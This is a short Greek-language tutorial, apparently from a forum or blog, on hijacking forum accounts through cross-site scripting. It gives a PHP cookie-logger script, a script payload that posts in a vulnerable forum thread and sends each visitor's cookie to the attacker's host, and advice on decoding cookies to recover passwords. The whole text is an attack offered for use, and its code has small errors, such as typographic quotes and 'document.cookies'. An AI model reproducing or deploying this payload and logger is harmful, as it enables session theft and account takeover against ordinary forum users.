Μία από τις πιο διαδεδομένες τεχνικές
για να κλέψουμε τον λογαριασμό κάποιου χρήστη ή και πολλών
χρηστών είναι να χρησιμοποιήσουμε την μέθοδο XSS (Cross Site Scripting).
Θα πρέπει καταρχάς να χρησιμοποιήσουμε
κάποιο web vulnerability scanner όπως το Acunetix ή το Paros για να
βρούμε τα ευάλωτα φόρουμ σε επιθέσεις XSS.Μόλις εντοπίσουμε τον στόχο
μας ακολουθούμε την παρακάτω διαδικασία.
1)Δημιουργούμε ένα αρχείο με το όνομα cookie.php και εισάγουμε τον παρακάτω κώδικα:
<?php
$cookie = $_GET['c'];
$ip = getenv (’REMOTE_ADDR’);
$date=date(”j F, Y, g:i a”);;
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (”Location: http://www.test.com”);
?>
Το αρχείο cookie.php
το ανεβάζουμε σε κάποιο host site που έχουμε.Φυσικά στην προτελευταία
σειρά τοποθετούμε την διεύθυνση του host μας αντί για test.com δηλαδή.
2)Δημιουργούμε ένα νέο thread στο ευάλωτο φόρουμ και πληκτρολογούμε το ακόλουθο:
<script>document.location=”http://www.myhost.com/cookie.php?c=” + document.cookies</script>
Φυσικά στο myhost.com βάζουμε το δικό μας host όπως είναι κατανοητό.
Τώρα όταν κάποιο μέλος του φόρουμ ανοίξει το thread τα cookies του θα σταλούν στο:
http://www.myhost.com/cookie.html
Οπότε έχοντας το cookie και σε συνδοιασμό
με το πρόγραμμα Cain ή κάποιο άλλο cookie decoder θα μπορέσουμε να
αποκρυπτογραφήσουμε το cookie για να βρούμε το password.
